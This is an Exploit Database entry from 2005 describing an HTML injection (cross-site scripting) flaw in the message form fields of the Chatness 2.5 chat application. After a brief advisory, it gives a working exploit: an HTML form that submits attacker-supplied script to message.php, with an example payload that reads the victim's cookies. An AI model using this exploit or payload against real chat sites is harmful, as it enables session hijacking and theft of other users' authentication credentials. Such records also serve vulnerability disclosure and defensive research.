Chatness 2.5 Message Form Field HTML Injection Vulnerability

ID EDB-ID:25315
Type exploitdb
Reporter 3nitro
Modified 2005-03-29T00:00:00


Chatness 2.5 Message Form Field HTML Injection Vulnerability. Webapps exploit for php platform


Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields.

Exploitation will allow an attacker to inject hostile HTML and script code into the session of another user. An attacker could take advantage of this vulnerability to steal cookie-based authentication credentials or launch other attacks. 

<title>Chatness 2.5.1 Html Injection Exploit</title>
<h1>Chatness 2.5.1 Html Injection Exploit</h1>
<form method="POST" action="">
<b>XSS in message.php:</b><p>
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
example: <script>document.write(document.cookie)</script></p>
<p> <input type='submit' name='login' value='RUN!' class='button'></p>
<p> </p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>